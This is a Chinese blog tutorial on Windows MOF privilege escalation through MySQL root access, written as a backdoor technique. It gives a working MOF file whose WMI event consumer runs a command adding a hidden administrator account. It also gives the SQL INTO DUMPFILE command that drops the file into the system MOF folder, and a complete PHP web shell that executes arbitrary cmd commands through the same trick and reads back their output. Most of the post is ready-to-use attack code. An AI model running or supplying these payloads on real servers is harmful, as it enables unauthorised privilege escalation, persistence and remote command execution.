第十一节 mof提取(一般用来留后门

1. mof

  托管对象格式 (MOF) 文件是创建和注册提供程序、事件类别和事件的简便方法。在 MOF 文件中创建类实例和类定义后,可以对该文件进行编译。编译 MOF 文件将在 CIM 储存库中注册所有的类定义和实例。之后,提供程序、事件类别和事件信息便可由 便可由 WMI Visual Studio Analyzer 使用。 在 MOF 文件中创建提供程序、事件类别和事件类的实例,并且定义想要分析的自定义对象,之后,就可以对该文件进行编译

 

2. 提权原理

  mof是Windows系统的一个文件(在C:/windows/system32/wben/mof/nullevt.mof)叫做“托管对象格式”,其作用是每隔五秒就回去监控进程创建和死亡。

  在MySQL中拥有root权限后,然后用root的权限上传我们的mof。隔了一定的时间后该mof文件就会被执行,这个mof当中有一段是vbs脚本,这个vbs脚本大多数是cmd的添加管理员用户的命令。

 

3. 提权过程

  mof文件代码(记得改账号密码):

 1 #pragma namespace("\\\\.\\root\\subscription") 
 2 
 3 instance of __EventFilter as $EventFilter 
 4 { 
 5     EventNamespace = "Root\\Cimv2"; 
 6     Name  = "filtP2"; 
 7     Query = "Select * From __InstanceModificationEvent " 
 8             "Where TargetInstance Isa \"Win32_LocalTime\" " 
 9             "And TargetInstance.Second = 5"; 
10     QueryLanguage = "WQL"; 
11 }; 
12 
13 instance of ActiveScriptEventConsumer as $Consumer 
14 { 
15     Name = "consPCSV2"; 
16     ScriptingEngine = "JScript"; 
17     ScriptText = 
18     "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user moonteam$ xxx12456 /add && net localgroup administrators moonteam$ /add\")"; 
19 }; 
20 
21 instance of __FilterToConsumerBinding 
22 { 
23     Consumer   = $Consumer; 
24     Filter = $EventFilter; 
25 };

 

  通过shell将mof文件上传后,使用sql语句导出(MySQL执行)

1 select load_file('C:/Inetpub/wwwroot/www.xxx.com/nullevt.mof') into dumpfile 'C:/windows/system32/wbem/mof/nullevt.mof';

 

4. 脚本提权(尽量用脚本,上传到网站根目录)

  填写好MySQL的账号密码,进入脚本后再将命令输入执行

  1 <?php 
  2 $path="c:/ini.txt"; 
  3 session_start(); 
  4 if(!empty($_POST['submit'])){ 
  5 setcookie("connect"); 
  6 setcookie("connect[host]",$_POST['host']); 
  7 setcookie("connect[user]",$_POST['user']); 
  8 setcookie("connect[pass]",$_POST['pass']); 
  9 setcookie("connect[dbname]",$_POST['dbname']); 
 10 echo "<script>location.href='?action=connect'</script>"; 
 11 } 
 12 if(empty($_GET["action"])){ 
 13 ?> 
 14 
 15 <html> 
 16 
 17 <head><title>Win MOF Shell</title></head> 
 18 
 19 <body> 
 20 
 21 <form action="?action=connect" method="post"> 
 22 Host: 
 23 <input type="text" name="host" value="192.168.200.144:3306"><br/> 
 24 User: 
 25 <input type="text" name="user" value="root"><br/> 
 26 Pass: 
 27 <input type="password" name="pass" value="toor"><br/> 
 28 DB:   
 29 <input type="text" name="dbname" value="mysql"><br/> 
 30 <input type="submit" name="submit" value="Submit"><br/> 
 31 </form> 
 32 
 33 </body> 
 34 </html> 
 35 
 36 <?php 
 37 exit; 
 38 } 
 39 if ($_GET[action]=='connect') 
 40 { 
 41 $conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"])  or die('<pre>'.mysql_error().'</pre>'); 
 42 echo "<form action='' method='post'>"; 
 43 echo "Cmd:"; 
 44 echo "<input type='text' name='cmd' value='$strCmd'?>"; 
 45 echo "<br>"; 
 46 echo "<br>"; 
 47 echo "<input type='submit' value='Exploit'>"; 
 48 echo "</form>"; 
 49 echo "<form action='' method='post'>"; 
 50 echo "<input type='hidden' name='flag' value='flag'>"; 
 51 echo "<input type='submit'value=' Read  '>"; 
 52 echo "</form>"; 
 53 if (isset($_POST['cmd'])){ 
 54 $strCmd=$_POST['cmd']; 
 55 $cmdshell='cmd /c '.$strCmd.'>'.$path; 
 56 $mofname="c:/windows/system32/wbem/mof/system.mof"; 
 57 $payload = "#pragma namespace(\"\\\\\\\\\\\\\\\\.\\\\\\\\root\\\\\\\\subscription\") 
 58 
 59 instance of __EventFilter as \$EventFilter 
 60 { 
 61   EventNamespace = \"Root\\\\\\\\Cimv2\"; 
 62   Name  = \"filtP2\"; 
 63   Query = \"Select * From __InstanceModificationEvent \" 
 64       \"Where TargetInstance Isa \\\\\"Win32_LocalTime\\\\\" \" 
 65       \"And TargetInstance.Second = 5\"; 
 66   QueryLanguage = \"WQL\"; 
 67 }; 
 68 
 69 instance of ActiveScriptEventConsumer as \$Consumer 
 70 { 
 71   Name = \"consPCSV2\"; 
 72   ScriptingEngine = \"JScript\"; 
 73   ScriptText = 
 74   \"var WSH = new ActiveXObject(\\\\\"WScript.Shell\\\\\")\\\\nWSH.run(\\\\\"$cmdshell\\\\\")\"; 
 75 }; 
 76 
 77 instance of __FilterToConsumerBinding 
 78 { 
 79   Consumer = \$Consumer; 
 80   Filter = \$EventFilter; 
 81 };"; 
 82 mysql_select_db($_COOKIE["connect"]["dbname"],$conn); 
 83 $sql1="select '$payload' into dumpfile '$mofname';"; 
 84 if(mysql_query($sql1)) 
 85   echo "<hr>Execute Successful!<br> Please click the read button to check the  result!!<br>If the result is not correct,try read again later<br><hr>"; else die(mysql_error()); 
 86 mysql_close($conn); 
 87 } 
 88 
 89 if(isset($_POST['flag'])) 
 90 { 
 91   $conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"])  or die('<pre>'.mysql_error().'</pre>'); 
 92   $sql2="select load_file(\"".$path."\");"; 
 93   $result2=mysql_query($sql2); 
 94   $num=mysql_num_rows($result2); 
 95   while ($row = mysql_fetch_array($result2, MYSQL_NUM)) { 
 96     echo "<hr/>"; 
 97     echo '<pre>'. $row[0].'</pre>'; 
 98   } 
 99   mysql_close($conn); 
100 } 
101 } 
102 ?>

 

posted on 2021-08-13 17:57  EndlessShw  阅读(251)  评论(0编辑  收藏  举报
Copyright © 2024 EndlessShw
Powered by .NET 8.0 on Kubernetes Powered by: 博客园